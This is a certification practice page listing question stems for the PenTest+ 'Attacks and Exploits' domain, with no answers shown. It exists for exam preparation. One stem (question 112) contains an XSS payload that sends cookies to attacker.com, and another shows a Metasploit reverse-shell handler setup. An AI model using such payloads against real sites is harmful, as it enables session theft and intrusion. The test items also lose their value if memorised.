
Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.


Attacks and Exploits

Practice PT0-002 Attacks and Exploits questions with full explanations on every answer.

181 questions


All PT0-002 Attacks and Exploits questions (181)


1

A penetration tester is conducting an internal network assessment and wants to capture NTLMv2 hashes from Windows hosts without sending any authentication traffic. Which tool and attack technique should the tester use?

2

During a web application test, the tester discovers a parameter that reflects user input in the response without sanitization. Which type of vulnerability is most likely present?

3

A tester wants to exploit a Windows service running with SYSTEM privileges that has an unquoted service path containing spaces. Which technique should be used to escalate privileges?

4

A penetration tester is performing a password attack on a Windows domain and has captured NTLM hashes. Which tool can be used to perform a pass-the-hash attack to gain remote code execution on a target system?

5

During a web application test, the tester uses sqlmap and identifies a time-based blind SQL injection. Which technique is sqlmap using to extract data?

6

A penetration tester needs to escalate privileges on a Linux system and finds that the current user can run a specific command with sudo without a password. Which tool should the tester consult to find known exploitation techniques for that command?

7

A penetration tester is attempting to exploit a server-side request forgery (SSRF) vulnerability in a cloud-hosted web application to access the cloud metadata service. Which IP address should the tester target?

8

A tester has gained a low-privilege shell on a Windows machine and found that the user has the SeImpersonatePrivilege enabled. Which attack can be used to escalate privileges to SYSTEM?

9

A penetration tester wants to crack NTLM hashes obtained from a Windows domain. Which hashcat mode should the tester use?

10

During a penetration test, the tester discovers a JWT token that uses the 'alg:none' header. Which attack does this vulnerability enable?

11

A penetration tester has compromised a Linux host and wants to use it as a pivot point to access an internal network that is not directly reachable from the attacker's machine. Which tool can create a SOCKS proxy for routing traffic through the compromised host?

12

A tester is exploiting a vulnerable web application and wants to perform a UNION-based SQL injection to extract data. Which condition is necessary for a successful UNION attack?

13

A penetration tester is performing a Kerberoasting attack. Which TWO steps are required for a successful Kerberoasting attack?

14

A penetration tester is testing a web application and wants to exploit an XXE vulnerability to read sensitive files. Which TWO payloads could be used?

15

A penetration tester is performing lateral movement in a Windows domain after compromising a workstation. Which THREE techniques can be used to move to another machine?

16

During an internal penetration test, a tester wants to capture NTLMv2 hashes by poisoning LLMNR and NBT-NS traffic. Which tool should the tester use?

17

A penetration tester has successfully compromised a Windows machine and wants to perform lateral movement to another machine using captured NTLM hashes. Which tool would allow the tester to pass the hash and execute commands remotely?

18

During a penetration test, a tester identifies that a web application is vulnerable to Server-Side Request Forgery (SSRF). The tester attempts to access the AWS metadata endpoint to retrieve temporary credentials. Which IP address is commonly used for the cloud metadata endpoint?

19

A penetration tester is exploiting a SQL injection vulnerability in a login page. The tester wants to extract data from another table without returning data in the original query. Which SQL injection technique should the tester use?

20

A tester wants to crack NTLM hashes captured from a Windows domain. Which hashcat mode should be used for NTLM hashes?

21

During a Linux privilege escalation attempt, a tester finds a binary with the SUID bit set that is not on the GTFOBins list. The binary executes /bin/bash with the effective UID of root. What is the most likely way to exploit this?

22

A penetration tester is assessing a web application that uses JSON Web Tokens (JWT) for authentication. The tester discovers that the server does not validate the signature algorithm properly. Which attack should the tester attempt to forge a valid token?

23

Which Metasploit command is used to interact with an established session on a compromised host?

24

A tester is performing a Cross-Site Request Forgery (CSRF) attack on a web application that uses SameSite cookies. Which SameSite attribute value is most likely to prevent the attack?

25

During a Windows privilege escalation attempt, the tester finds that the current user has the SeImpersonatePrivilege enabled. Which tool is commonly used to exploit this privilege to gain SYSTEM?

26

A penetration tester has gained access to a Linux server and wants to move laterally to a Windows server. The tester captured a hash of a domain user. Which tool can be used to authenticate to the Windows server using the hash?

27

A tester is performing a Kerberoasting attack. After requesting TGS tickets, which hashcat mode should be used to crack them?

28

A penetration tester is conducting an internal network assessment. The tester wants to perform a man-in-the-middle attack to capture credentials. Which TWO tools can be used for ARP spoofing?

29

During a post-exploitation phase, a tester needs to establish persistence on a Windows target. Which THREE methods are commonly used for persistence on Windows?

30

A penetration tester is exploiting a web application and discovers an XML External Entity (XXE) vulnerability. Which TWO attacks can be performed using XXE?

31

A penetration tester is conducting a network attack and wants to intercept traffic between two hosts on the same local network by spoofing ARP responses. Which tool is specifically designed for this purpose?

32

During a penetration test, you capture NTLM hashes by poisoning LLMNR requests. Which tool would you use to exploit this and obtain the hashes?

33

After compromising a Linux host, you want to escalate privileges by exploiting a cron job that runs a script with root privileges. The script references an executable using a relative path. Which attack technique is most appropriate?

34

In a web application test, you find a parameter that directly references internal object IDs (e.g., user_id=123) and changing the ID allows access to another user's data. This vulnerability is known as:

35

During an internal penetration test, you need to perform lateral movement to a Windows target. You have a plaintext password for a domain user account. Which tool would be most appropriate to authenticate to the target using WMI?

36

You have obtained an NTLM hash of a domain admin account and want to authenticate to a remote server without cracking the password. Which technique enables you to authenticate using the hash?

37

A penetration tester is exploiting a SQL injection vulnerability in a web application. They want to extract data from the database without displaying it on the page. Which SQL injection technique should they use?

38

During a web application test, you discover a parameter that reflects user input in the response without proper encoding. You craft a payload that executes JavaScript in the victim's browser. This vulnerability is best classified as:

39

You are attacking a web application and notice that it makes requests to internal services. You attempt to access the cloud metadata endpoint at http://169.254.169.254/. Which vulnerability are you most likely exploiting?

40

After gaining initial access to a Windows host, you want to escalate privileges by exploiting a service that runs as SYSTEM but has an unquoted service path. What is the attack vector?

41

Which Metasploit command is used to display information about the current meterpreter session, including the target OS and user?

42

A penetration tester needs to crack a large number of NTLM hashes. They have a wordlist and want to apply common password mutations. Which hashcat option enables the use of a rule file to mutate words?

43

During a penetration test of a web application, you want to test for Cross-Site Request Forgery (CSRF) vulnerabilities. Which TWO conditions are necessary for a CSRF attack to succeed?

44

You have gained a foothold on a Linux server and identified a SUID binary that can be exploited to read arbitrary files. Which THREE techniques could be used to escalate privileges or gather sensitive information?

45

A penetration tester wants to pivot from a compromised Linux host to attack internal network resources that are not directly accessible. Which THREE tools or techniques can be used for pivoting?

46

During a penetration test, a tester captures NTLM hashes by spoofing LLMNR responses on the internal network. Which tool is most commonly used for this purpose?

47

A penetration tester wants to perform a pass-the-hash attack on a Windows target. Which tools can be used for this purpose? (Choose the best answer.)

48

During a web application test, the tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester modifies the JWT header to set the algorithm to 'none' and removes the signature. The server accepts the token. What type of attack is this?

49

A penetration tester needs to escalate privileges on a Linux system and finds that the user can run a script with sudo that has a vulnerable argument. Which resource should the tester consult to find exploitation techniques for common sudo misconfigurations?

50

A penetration tester obtains a meterpreter session on a Windows target. Which command would the tester use to check the current user's privileges and potentially escalate privileges if SeImpersonatePrivilege is enabled?

51

During a penetration test, a tester wants to crack NTLM hashes captured from a Windows domain. Which hashcat mode should the tester use for NTLM hashes?

52

A penetration tester is performing a web application test and wants to exploit a SQL injection vulnerability to extract data from a database. The tester knows that the application returns results in the HTTP response. Which type of SQL injection is being used?

53

A penetration tester discovers a web application that fetches URLs from user input without proper validation. The tester targets the internal cloud metadata endpoint at 169.254.169.254 to retrieve instance credentials. Which type of attack is this?

54

A penetration tester wants to use Metasploit to exploit a remote service. After selecting an exploit module, which command is used to set the remote host IP address?

55

During a Windows privilege escalation attempt, a tester finds that the SeImpersonatePrivilege is enabled for the current user. Which tool can be used to escalate privileges to SYSTEM using this privilege?

56

A penetration tester is performing an ARP spoofing attack using Bettercap to intercept traffic between a client and the gateway. What is the primary goal of this attack?

57

A tester finds a Linux binary with the SUID bit set that is owned by root and can be executed by any user. The binary is known to have a vulnerability that allows arbitrary code execution. Which command does the tester use to find all SUID binaries on the system?

58

A penetration tester has compromised a Linux server and wants to establish persistence. Which TWO of the following methods are commonly used for persistence on Linux?

59

During a penetration test, a tester successfully exploits a web application and gains a foothold. The tester needs to pivot to an internal network segment that is not directly accessible. Which THREE tools can the tester use to create a SOCKS proxy or tunnel for pivoting?

60

A penetration tester is assessing an Active Directory environment and wants to perform Kerberoasting to obtain service account passwords. Which TWO conditions are required for a successful Kerberoasting attack?

61

A penetration tester is performing a network attack and wants to intercept traffic between two hosts on the same local network. Which technique should the tester use to redirect traffic through their machine?

62

During a penetration test, the tester captured an NTLM hash using Responder and wants to pass the hash to gain access to a remote Windows system. Which tool would be most appropriate to perform a pass-the-hash attack?

63

A penetration tester is performing a SQL injection test on a web application. The tester sends the payload ' OR '1'='1 and receives the same response as with a normal request. However, when sending ' OR '1'='2, the response differs. Which type of SQL injection is most likely present?

64

During a web application penetration test, the tester discovers a JWT token in the Authorization header. The token uses the 'none' algorithm. What attack should the tester attempt?

65

A tester has exploited a Linux system and gained a low-privilege shell. The tester runs 'sudo -l' and sees that the current user can run /usr/bin/find as root without a password. Which privilege escalation technique should the tester use?

66

A penetration tester is performing an NTLM relay attack against a Windows network. The tester uses ntlmrelayx to relay captured NTLM authentication attempts to a target server. What must be true for this attack to succeed?

67

After gaining a foothold on a Windows server, a tester wants to laterally move to another machine. The tester has obtained NTLM hashes and wants to execute commands remotely. Which tool is specifically designed for remote command execution using hashes via WMI?

68

During a penetration test, the tester discovers a Linux binary with the SUID bit set owned by root. The binary is a custom script that executes 'cp' to copy files. The tester can control the source file path via an environment variable. Which privilege escalation technique should the tester attempt?

69

A penetration tester wants to crack NTLM hashes captured during an internal test. Which hashcat mode should the tester use for NTLM hashes?

70

A tester is performing a web application test and discovers a parameter that seems to reflect input in the response. The tester attempts a reflected XSS payload but the application filters script tags. Which XSS variant should the tester try next?

71

During a penetration test, the tester gains a Meterpreter session on a Windows target and wants to escalate privileges to SYSTEM. The current user has the SeImpersonatePrivilege token. Which tool should the tester use to exploit this privilege?

72

A tester is performing a Kerberoasting attack. After requesting TGS tickets for accounts with SPNs, what is the next step to obtain plaintext credentials?

73

A penetration tester is performing a web application test and identifies an endpoint that is vulnerable to Server-Side Request Forgery (SSRF). Which of the following actions can the tester perform using this vulnerability? (Choose TWO.)

74

During a Windows privilege escalation attempt, a penetration tester discovers that the always elevated installation policy is enabled. Which of the following actions can the tester take to exploit this misconfiguration? (Choose TWO.)

75

A penetration tester is conducting a web application test and discovers an XML External Entity (XXE) vulnerability. Which of the following attacks can the tester perform using XXE? (Choose THREE.)

76

During a penetration test, a tester captures NTLMv2 hashes by spoofing LLMNR and NBT-NS responses on the internal network. Which tool is most commonly used for this type of attack?

77

A penetration tester has gained a low-privilege shell on a Windows server and discovers the user has the SeImpersonatePrivilege. Which tool could the tester use to escalate privileges to SYSTEM?

78

During a web application test, the tester discovers a parameter that reflects user input in the response without proper encoding. The tester crafts a payload that executes JavaScript when another user views the page. Which type of XSS is this, and what is a primary risk?

79

A penetration tester needs to crack NTLM hashes obtained from a Windows domain. The hashes are in the format used by Windows. Which hashcat mode should the tester use?

80

While testing a Linux system, the tester finds a binary with the SUID bit set owned by root. The binary executes a command based on user input without verifying the path. Which privilege escalation technique does this exemplify?

81

A penetration tester wants to perform a pass-the-hash attack against a Windows system using a captured NTLM hash. Which tool can be used to authenticate and execute commands remotely?

82

A tester identifies a SQL injection vulnerability in a login form. The application responds with different error messages for valid and invalid queries. Which type of SQL injection is most likely present, and what tool could automate exploitation?

83

During an internal penetration test, the tester wants to relay captured NTLM authentication to a server to gain access. Which tool from the Impacket suite is specifically designed for NTLM relay attacks?

84

A penetration tester gains a shell on a Linux server and needs to pivot to an internal network. The tester's attack machine can reach the compromised server but not the internal network. Which tool can create a SOCKS proxy on the compromised server?

85

A tester wants to crack a password hash using a wordlist combined with rules to generate variations. Which hashcat attack mode should be used?

86

A web application uses JSON Web Tokens (JWT) for authentication. The tester intercepts a token and decodes it to find the header contains "alg":"none". What vulnerability does this indicate, and how can it be exploited?

87

After compromising a Windows workstation, the tester wants to extract password hashes from the local SAM database. Which Metasploit meterpreter command should be used?

88

A penetration tester is conducting a web application test and discovers a server-side request forgery (SSRF) vulnerability. The application accepts a URL parameter and fetches the resource. Which TWO of the following are common SSRF exploitation techniques?

89

During a Windows privilege escalation attempt, the tester finds that the AlwaysInstallElevated registry key is set to 1. Which TWO actions can the tester perform to escalate privileges?

90

A penetration tester has gained initial access to a Linux server and wants to establish persistence. Which THREE of the following methods are commonly used for persistence on Linux systems?

91

A penetration tester runs the following command: `hashcat -m 1000 -a 0 hashes.txt rockyou.txt`. What type of attack is being performed?

92

During a penetration test, a tester captures NTLM hashes using Responder. Which of the following techniques would allow the tester to authenticate to a remote server without cracking the password?

93

A penetration tester is performing a web application test and discovers that the application reflects user input in the response without proper sanitization. However, the tester notices that the input is handled client-side via JavaScript. Which type of XSS is this?

94

A tester is exploiting a Linux system and finds a binary with the SUID bit set owned by root. The binary executes other commands. Which technique would allow privilege escalation to root?

95

A tester runs the following Metasploit commands:

```
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.0.0.5
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > run
```

What is the purpose of this configuration?

96

A tester wants to enumerate SMB shares and execute commands remotely on a Windows target using captured credentials. Which tool is most appropriate?

97

During a web application test, a tester discovers that the application uses JWTs for session management. The tester captures a JWT and notices the 'alg' header is set to 'none'. Which attack is the tester likely to perform?

98

A tester is performing a privilege escalation on a Windows system and finds that the user has SeImpersonatePrivilege enabled. Which tool could be used to escalate to SYSTEM?

99

A tester is attempting to crack WPA2 handshakes captured from a wireless network. Which hashcat mode should be used?

100

A tester is exploiting a SQL injection vulnerability in a login form. The application returns different responses for valid and invalid queries. However, the tester cannot see the database output. Which type of SQL injection is most likely?

101

During a penetration test, a tester gains initial access to a Linux server and wants to pivot to an internal network that is not directly accessible. Which of the following tools is specifically designed for creating SOCKS proxies for pivoting?

102

A tester is performing a web application test and finds an endpoint that accepts XML input. The tester sends a payload that includes an external entity referencing a local file. Which vulnerability is being tested?

103

A penetration tester is performing a full-scope engagement and needs to identify potential privilege escalation vectors on a Windows system. Which TWO of the following are valid Windows privilege escalation techniques?

104

During a web application penetration test, a tester wants to identify vulnerabilities that allow unauthorized access to internal resources. Which TWO of the following are commonly exploited to access internal services?

105

A penetration tester successfully compromises a web server and wants to establish persistence on the system. Which THREE of the following are effective persistence mechanisms on a Linux system?

106

During a penetration test, a tester runs the Responder tool on the internal network and captures an NTLMv2 hash. Which type of network attack is being performed?

107

A penetration tester wants to crack NTLM hashes obtained from a Windows system. Which Hashcat mode should be used?

108

During a web application test, a tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester intercepts a JWT and changes the algorithm header to 'none' with an empty signature. Which attack is being attempted?

109

A penetration tester gains a low-privilege shell on a Linux server. The command 'sudo -l' reveals that the user can run /usr/bin/less as root without a password. Which tool would the tester likely use to escalate privileges?

110

During a penetration test, a tester uses Metasploit to exploit a Windows service and gets a meterpreter session. The tester wants to dump hashes from the compromised system. Which meterpreter command should be used?

111

A penetration tester is testing a web application and discovers an endpoint that returns XML data. The tester attempts to read /etc/passwd by injecting an external entity. Which type of attack is this?

112

While performing a web application penetration test, a tester observes that the application reflects user input in the page without proper sanitization. To steal session cookies, the tester crafts a payload like `<script>document.location='http://attacker.com/?cookie='+document.cookie</script>`. Which XSS type is this?

113

A penetration tester wants to perform a pass-the-hash attack against a Windows system. Which tool can be used to authenticate using the NTLM hash instead of a password?

114

During a post-exploitation phase, a tester has a foothold on a Linux server and wants to pivot to an internal web server that is not directly accessible. The tester has SSH access to the compromised server. Which command would create a local port forward to access the internal web server on port 80?

115

A penetration tester is performing a Kerberoasting attack. After requesting TGS tickets from a domain controller, which tool would be used to crack the tickets offline?

116

During a Windows privilege escalation attempt, a tester finds that the current user has the SeImpersonatePrivilege enabled. Which tool can be used to exploit this privilege to gain SYSTEM access?

117

A tester finds that a web application is vulnerable to Server-Side Request Forgery (SSRF). The tester wants to access the cloud metadata endpoint to obtain instance credentials. Which IP address is commonly used for the cloud metadata service?

118

A penetration tester has obtained a set of NTLM hashes from a Windows domain. The tester wants to perform lateral movement to other systems. Which TWO tools can be used for this purpose? (Select TWO.)

119

During a web application penetration test, a tester identifies a SQL injection vulnerability. Which TWO techniques could be used to extract data from the database? (Select TWO.)

120

A penetration tester has gained a foothold on a Linux server and wants to escalate privileges to root. Which THREE of the following are potential privilege escalation vectors? (Select THREE.)

121

During a penetration test, a tester captures NTLMv2 hashes using Responder. The tester then uses ntlmrelayx to relay the captured hashes to a target server. Which of the following best describes this attack technique?

122

A penetration tester is performing an internal assessment and wants to intercept network traffic to capture credentials. Which tool is specifically designed for ARP spoofing and can also perform SSL stripping?

123

A penetration tester has gained a low-privilege shell on a Windows server and discovered that the SeImpersonatePrivilege is enabled. Which of the following tools would be most appropriate to escalate privileges to SYSTEM-level access?

124

A tester is exploiting a web application and identifies a parameter that reflects user input in the response without sanitization. The tester wants to steal session cookies from other users. Which type of cross-site scripting (XSS) attack should the tester use?

125

A penetration tester is using Hashcat to crack NTLM hashes obtained from a Windows domain controller. Which hash mode should the tester specify for NTLM hashes?

126

During a web application test, a tester discovers that the application uses JSON Web Tokens (JWT) for authentication. The tester attempts to modify the 'alg' header to 'none' and sends the token. The server accepts the forged token. Which vulnerability is being exploited?

127

A penetration tester is performing an internal test and wants to move laterally from a compromised workstation to a domain controller. The tester has obtained an NTLM hash for a domain admin. Which of the following tools would allow the tester to authenticate using the hash without cracking it?

128

A tester finds a Linux binary with the SUID bit set. The binary is owned by root and executes a shell command. The tester runs the binary and gets a root shell. Which command would the tester likely have used to discover this SUID binary?

129

A tester is performing an SQL injection attack on a login form. The tester inputs a single quote (') and receives a database error. The application returns different responses for true and false conditions. Which type of SQL injection is most likely occurring?

130

A tester is targeting a web application that makes server-side requests to internal resources based on user input. The tester attempts to access the AWS metadata endpoint at http://169.254.169.254/latest/meta-data/. The request returns sensitive cloud credentials. Which vulnerability is being exploited?

131

During a penetration test, a tester gains access to a Linux system and runs 'sudo -l', which reveals that the user can run /usr/bin/python with root privileges without a password. Which resource should the tester consult to find a method to escalate privileges using this configuration?

132

A tester wants to perform a Kerberoasting attack against an Active Directory domain. The tester has a domain account with no special privileges. Which of the following is required to successfully request TGS tickets for offline cracking?

133

A penetration tester has obtained a meterpreter session on a Windows target. The tester wants to escalate privileges to SYSTEM and then dump password hashes. Which two meterpreter commands should the tester use in sequence? (Choose TWO.)

134

A tester is performing a post-exploitation phase on a compromised Linux server and wants to establish persistence. Which THREE of the following methods are commonly used for Linux persistence? (Choose THREE.)

135

A penetration tester is exploiting a web application and discovers an endpoint that allows an attacker to read arbitrary files on the server by manipulating XML input. The application uses an XML parser that does not disable external entities. Which TWO attacks can the tester perform using this vulnerability? (Choose TWO.)

136

During a penetration test, you run the following command on a Linux target: `find / -type f -perm /4000 2>/dev/null`. What are you attempting to identify?

137

You have captured an NTLMv2 hash from an LLMNR poisoning attack using Responder. Which tool and mode would you use to attempt to crack the hash using a dictionary attack?

138

During a web application test, you discover an endpoint that accepts a URL parameter and fetches the content. You try `http://169.254.169.254/latest/meta-data/` and receive a response. Which vulnerability is this?

139

In a Windows domain, you have compromised a user account with SeImpersonatePrivilege enabled. Which tool or technique would best leverage this privilege to escalate to SYSTEM?

140

Which SQL injection technique involves injecting a query that causes a delay in response, allowing the attacker to infer information based on response time?

141

After exploiting a Linux server, you need to pivot to a restricted network subnet. You have SSH access to the compromised server. Which command would create a SOCKS proxy on the server to route traffic through it?

142

You are testing a web application and notice that it uses JSON Web Tokens (JWT) for authentication. You change the algorithm to 'none' and remove the signature, and the token is accepted. Which JWT vulnerability did you exploit?

143

During a penetration test, you successfully execute a Meterpreter session on a Windows target. You want to dump password hashes from the SAM database. Which Meterpreter command should you use?

144

In Metasploit, after searching for an exploit, you select it with 'use exploit/...' and set required options. What is the final command to execute the exploit against the target?

145

You are performing a password attack on a Linux system. You have obtained the /etc/shadow file. Which password cracking tool would be most efficient for a rule-based attack using a wordlist?

146

During a web application test, you find a feature that allows users to export data as PDF. The PDF generation uses user input without sanitization. You inject an XML external entity that reads /etc/passwd and the content appears in the PDF. Which vulnerability is present?

147

You are performing a penetration test and capture a Kerberos TGS ticket for a service account. What kind of attack can you perform offline to crack the service account password?

148

You are enumerating a Linux system for privilege escalation vectors. Which TWO conditions below could be exploited to escalate privileges? (Select TWO.)

149

During a web application penetration test, you find that the application is vulnerable to CSRF. Which TWO factors could prevent exploitation even if a CSRF vulnerability exists? (Select TWO.)

150

You have compromised a low-privileged Windows user and want to move laterally to a domain controller. Which THREE techniques could be used for lateral movement if you have valid credentials? (Select THREE.)

151

During a penetration test, a tester captures NTLMv2 hashes by spoofing LLMNR responses. Which tool is most commonly used for this purpose?

152

A penetration tester wants to perform a pass-the-hash attack against a Windows target. Which tools can be used to authenticate using an NTLM hash without knowing the plaintext password? (Choose the best option.)

153

During a web application test, a tester discovers a parameter that appears to be vulnerable to SQL injection. They want to extract data from a database using a technique that does not rely on visible output. Which type of SQL injection is most appropriate?

154

A penetration tester identifies a Linux binary with the SUID bit set. Which command can find all SUID binaries on a Linux system?

155

While exploiting a Windows machine, a tester gains a shell with limited privileges. They attempt to escalate privileges using a tool that exploits the SeImpersonatePrivilege. Which tool is specifically designed for this purpose on modern Windows versions?

156

A tester is performing a JWT attack and modifies the header to set the algorithm to 'none'. Which vulnerability are they exploiting?

157

After gaining initial access to a target, a tester wants to pivot to an internal network that is not directly accessible. Which technique can be used to forward traffic from the tester's machine through the compromised host to reach internal services?

158

A penetration tester needs to perform Kerberoasting against an Active Directory domain. Which step is required after requesting TGS tickets?

159

During a web application test, a tester discovers an endpoint that fetches a URL from user input without validation. They attempt to access the AWS metadata endpoint. Which IP address is commonly used for the cloud metadata service?

160

A tester exploits an XXE vulnerability to read local files. Which of the following is a typical XXE payload to read /etc/passwd?

161

After compromising a host, a tester wants to maintain persistence on a Windows system by executing a payload each time a user logs in. Which registry key is commonly used for this?

162

A tester is using Hashcat to crack NTLM hashes. They want to try all possible passwords consisting of exactly 8 lowercase letters. Which attack mode and mask should they use?

163

A penetration tester is performing a web application assessment. Which of the following are common techniques to identify and exploit IDOR vulnerabilities? (Select TWO.)

164

During a Linux privilege escalation attempt, a tester checks for misconfigurations that could allow running commands as root. Which of the following are potential vectors? (Select THREE.)

165

A penetration tester has gained a foothold in a Windows domain and wants to perform lateral movement. Which of the following tools or techniques can be used? (Select THREE.)

166

During a penetration test, a tester uses Responder to capture NTLM hashes from a Windows network. Which of the following protocols is MOST commonly targeted by Responder for poisoning?

167

A penetration tester gains a low-privilege shell on a Linux server. Using 'sudo -l', the tester finds that they can run '/usr/bin/vi' as root without a password. Which technique would the tester MOST likely use to escalate privileges?

168

During a web application test, a tester discovers a JWT token with the following header: {'alg':'HS256','typ':'JWT'}. The token payload contains 'admin':false. The tester attempts to change the algorithm to 'none' and removes the signature. Which vulnerability is being exploited?

169

A penetration tester uses Hashcat to crack NTLM hashes captured during a pass-the-hash attack. Which Hashcat mode should the tester use for NTLM hashes?

170

A penetration tester has compromised a Windows machine and wants to perform lateral movement to another machine on the same network. The tester has obtained NTLM hashes, but not plaintext passwords. Which TWO tools can be used for pass-the-hash attacks?

171

During a Linux privilege escalation assessment, the tester finds that a binary with SUID root can execute arbitrary commands. Which TWO of the following methods are MOST likely to exploit this?

172

A penetration tester is conducting a web application test and finds a parameter that is vulnerable to XXE. Which THREE of the following actions can the tester perform using XXE?

173

A penetration tester is using Metasploit to exploit a remote Windows service. After a successful exploit, the tester gets a meterpreter session. Which TWO commands can the tester use to gather system information and credentials?

174

A penetration tester is performing post-exploitation on a compromised Linux server and wants to maintain persistence. Which TWO of the following methods are commonly used for Linux persistence?

175

During a penetration test, the tester discovers a web application vulnerable to CSRF. The application uses SameSite cookies set to 'Lax'. Which THREE methods might the tester use to exploit the CSRF vulnerability?

176

A penetration tester is using Hashcat to crack password hashes. Which TWO attack modes are commonly used?

177

During a Windows privilege escalation attempt, the tester finds that the current user has SeImpersonatePrivilege enabled. Which THREE tools or techniques can be used to exploit this privilege?

178

A penetration tester is performing a web application test and identifies a potential SQL injection vulnerability. Which TWO methods can the tester use to confirm the vulnerability and extract data?

179

During a penetration test, the tester gains access to a domain-joined Windows machine and wants to perform Kerberoasting. Which THREE conditions are necessary for a successful Kerberoasting attack?

180

A penetration tester is using Metasploit to pivot from a compromised host to an internal network. Which THREE Metasploit features can facilitate pivoting?

181

A penetration tester has gained initial access to an internal Windows server and wants to escalate privileges to SYSTEM. The tester identified that the current user has the SeImpersonatePrivilege enabled. Which TWO of the following tools or techniques would be most appropriate to exploit this privilege for privilege escalation?

Other PT0-002 exam domains

Information Gathering and Vulnerability Scanning, Planning and Scoping, Reporting and Communication, Tools and Code Analysis

Frequently asked questions

What does the Attacks and Exploits domain cover on the PT0-002 exam?

The Attacks and Exploits domain covers the key concepts tested in this area of the PT0-002 exam blueprint published by CompTIA. Courseiva provides free domain-focused practice, mock exams, missed-question review, and readiness tracking across all PT0-002 domains — no account required.

How many Attacks and Exploits questions are in the PT0-002 question bank?

The Courseiva PT0-002 question bank contains 181 questions in the Attacks and Exploits domain. Click any question to see the full explanation and answer breakdown.

What is the best way to practice Attacks and Exploits for PT0-002?

Start with a 10-question focused session to identify your baseline accuracy in this domain. Read every explanation — even for questions you answer correctly — to understand the reasoning. Once you score consistently above 80%, move to a 20–30 question session to confirm depth before moving to the next domain.

Can I practice only Attacks and Exploits questions for PT0-002?

Yes — the session launcher on this page draws questions exclusively from the Attacks and Exploits domain. Choose 10, 20, 30, or 50 questions for a focused session, or click individual questions to review them one by one.
